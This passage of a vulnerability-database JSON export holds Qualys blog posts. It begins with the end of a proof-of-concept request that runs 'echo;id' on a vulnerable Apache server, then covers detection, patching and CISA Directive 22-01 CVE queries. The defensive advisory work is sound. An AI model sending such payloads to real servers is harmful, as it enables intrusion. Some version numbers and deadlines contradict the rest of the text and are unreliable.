Content-Type: application/x-www-form-urlencoded\n Content-Length: 7\n \n echo;id\n\nResponse:\n \n \n HTTP/1.1 200 OK\n Date: Mon, 18 Oct 2021 10:42:40 GMT\n Server: Apache/2.4.50 (Unix)\n Connection: close\n Content-Length: 45\n \n uid=1(daemon) gid=1(daemon) groups=1(daemon)\n\n### Detecting the Vulnerabilities with Qualys WAS\n\nCustomers can detect these vulnerabilities with Qualys Web Application Scanning using the following QIDs:\n\n * 150372: Apache HTTP Server Path Traversal (CVE-2021-41773)\n * 150373: Apache HTTP Server Remote Code Execution (CVE-2021-41773)\n * 150374: Apache HTTP Server Multiple Vulnerabilities (CVE-2021-42013)\n\n\nQID 150372 \u2013 Apache HTTP Server Path Traversal (CVE-2021-41773)\n\n### Report\n\nOnce the vulnerability is successfully detected by Qualys WAS, users shall see similar kind of results for QID 150372 in the vulnerability scan report:\n\n\n\n### Solution\n\nOrganizations using Apache HTTP Server 2.4.49 or 2.4.50 are advised to upgrade to HTTP Server 2.5.51 or later version to remediate CVE-2021-41773 &amp; CVE-2021-42013, more information can be referred at [Apache Security advisory](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\nFor maintaining best security practices, Qualys also advises users to ensure the following:\n\n * `mod_cgi` module is disabled by default unless the business requires it.\n * filesystem directory directive to be updated with `Require all denied` as show below:\n \n \n <Directory />\n Require all denied\n </Directory>\n \n\n### Credits\n\n**Apache Security advisory:**\n\n<https://httpd.apache.org/security/vulnerabilities_24.html>\n\n**CVE Details:**\n\n<https://nvd.nist.gov/vuln/detail/CVE-2021-41773> \n<https://nvd.nist.gov/vuln/detail/CVE-2021-42013>\n\n**Credits for the vulnerability discovery go to:**\n\n * Ash Daulton along with the cPanel Security Team\n * Juan Escobar from Dreamlab Technologies\n * Fernando Mu\u00f1oz from NULL Life CTF Team\n * Shungo Kumasaka and Nattapon Jongcharoen\n\n**References:**\n\n * <https://twitter.com/ptswarm/status/1445376079548624899>\n * <https://twitter.com/hackerfantastic/status/1445529822071967745>\n * <https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis?referrer=blog>\n\n### Contributor\n\n**Jyoti Raval**, Lead Web Application Security Analyst, Qualys", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-28T06:22:22", "type": "qualysblog", "title": "Apache HTTP Server Path Traversal & Remote Code Execution (CVE-2021-41773 & CVE-2021-42013)", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-28T06:22:22", "id": "QUALYSBLOG:78A056D339E07378EFC349E5ACA8EC30", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), &quot;Reducing the Significant Risk of Known Exploited Vulnerabilities.&quot; [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update agency internal vulnerability management procedures within 60 days according to this directive and remediate each vulnerability according to the timelines outlined in &#x27;CISA&#x27;s vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations&#x27; digital infrastructure and automate remediation. Qualys&#x27; guidance for rapid response to Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency&#x27;s behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA&#x27;s public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) are already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 (34%) Vulnerabilities need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA&#x27;s Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [&quot;CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES&quot;](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most &quot;Category 2&quot; vulnerabilities by **November 17, 2021**, and &quot;Category 3&quot; by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive&#x27;s aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[&#x27;CVE-2021-1732\u2032,&#x27;CVE-2020-1350\u2032,&#x27;CVE-2020-1472\u2032,&#x27;CVE-2021-26855\u2032,&#x27;CVE-2021-26858\u2032,&#x27;CVE-2021-27065\u2032,&#x27;CVE-2020-0601\u2032,&#x27;CVE-2021-26857\u2032,&#x27;CVE-2021-22893\u2032,&#x27;CVE-2020-8243\u2032,&#x27;CVE-2021-22900\u2032,&#x27;CVE-2021-22894\u2032,&#x27;CVE-2020-8260\u2032,&#x27;CVE-2021-22899\u2032,&#x27;CVE-2019-11510&#x27;]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it&#x27;s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys&#x27; threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection &amp; Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:&quot;true&quot;_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", 